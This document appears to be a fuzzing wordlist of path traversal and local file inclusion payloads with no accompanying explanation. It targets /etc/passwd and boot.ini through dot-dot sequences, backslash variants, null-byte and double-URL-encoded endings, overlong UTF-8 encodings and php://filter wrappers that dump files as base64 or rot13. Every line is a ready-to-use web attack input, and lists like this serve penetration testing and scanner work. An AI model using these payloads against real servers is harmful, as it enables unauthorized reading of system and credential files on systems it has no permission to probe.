../../../etc/passwd
../../../etc/passwd%00
///etc///passwd%2500	
///etc///passwd%00	
///etc///passwd
../etc/passwd%2500
../etc/passwd%00
../etc/passwd
..///etc///passwd%2500
..///etc///passwd%00
..///etc///passwd
..///..///etc///passwd%2500
..///..///etc///passwd%00
..///..///etc///passwd
..///..///..///..///..///..///..///..///etc///passwd%2500
..///..///..///..///..///..///..///..///etc///passwd%00
..///..///..///..///..///..///..///..///etc///passwd
\etc\passwd%2500
\etc\passwd%00
\etc\passwd
..\etc\passwd%2500
..\etc\passwd%00
..\etc\passwd
..\..\etc\passwd%2500
..\..\etc\passwd%00
..\..\etc\passwd
..\..\..\etc\passwd%2500
..\..\..\etc\passwd%00
..\..\..\etc\passwd
..\..\..\..\etc\passwd%2500
..\..\..\..\etc\passwd%00
..\..\..\..\etc\passwd
..\..\..\..\..\etc\passwd%2500
..\..\..\..\..\etc\passwd%00
..\..\..\..\..\etc\passwd
..\..\..\..\..\..\etc\passwd%2500
..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\etc\passwd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
....//....//....//....//....//etc/passwd
..///////..////..//////..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd
pHp://FilTer/convert.base64-encode/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
..//..//..//..//..//boot.ini
../../../../../../../../../../../../boot.ini
../../boot.ini
..\../..\../..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../boot.ini#
..\..\..\..\..\..\..\..\..\..\boot.ini#
../../../../../../../../../../../boot.ini#.html
